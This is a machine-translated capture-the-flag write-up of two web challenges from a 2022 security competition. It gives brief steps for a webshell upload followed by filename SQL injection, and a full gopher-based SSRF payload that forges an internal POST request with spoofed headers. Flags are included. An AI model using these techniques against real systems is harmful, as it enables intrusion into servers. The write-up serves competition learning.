当前位置：网站首页>2022 2nd cyber edge cup cyber security competition Web

2022 2nd cyber edge cup cyber security competition Web

2022-07-27 21:58:00 【web18224617243】

2022 The second cyber blade cup cyber security competition -Web

Preface

Tips ： This content consists of night blade TEOT team - Master original , No plagiarism ！

One 、Web2-upload

The difficulty coefficient ：4.0
Title Description ： Only unexpected , No, I can't ,sql yyds. See the attachment for the title link , Each link can be accessed , Environmental Science 5 Minutes to restart .

Upload files , Just upload a horse
Use Burp Grab the bag
According to the prompt , Change type
Upload files
Query to filename Upload point , An error injection , obtain FLAG
flag{5937a0b90b5966939cccd369291c68aa}

Two 、Web3-Sign_in

The difficulty coefficient ：3.0
Title Description ： Fried chicken simple sign in question , You have a good time ~~~~ See the attachment for the title link , Each link can be accessed , Environmental Science 5 Minutes to restart .

adopt ARP To record WEB Address
IP： 172.73.24.100
After step-by-step prompts, the final structure Payload obtain FLAG.
Payload:
http://124.220.9.19:20001/?
url=gopher://172.73.24.100:80/_POST%2520%252Findex.php%253Fa%253Dflag%2520HTTP%2 52F1.1%250D%250AHost%253A%2520172.73.24.100%250D%250AContent-
Type%253A%2520application%252Fx-www-form-urlencoded%250D%250AContent- Length%253A%252011%250D%250AX-FORWARDED-
FOR%253A%2520127.0.0.1%250D%250AREFERER%3A%20bolean.club%250D%250A%250D%250Ab%25 3Dflag%250D%250A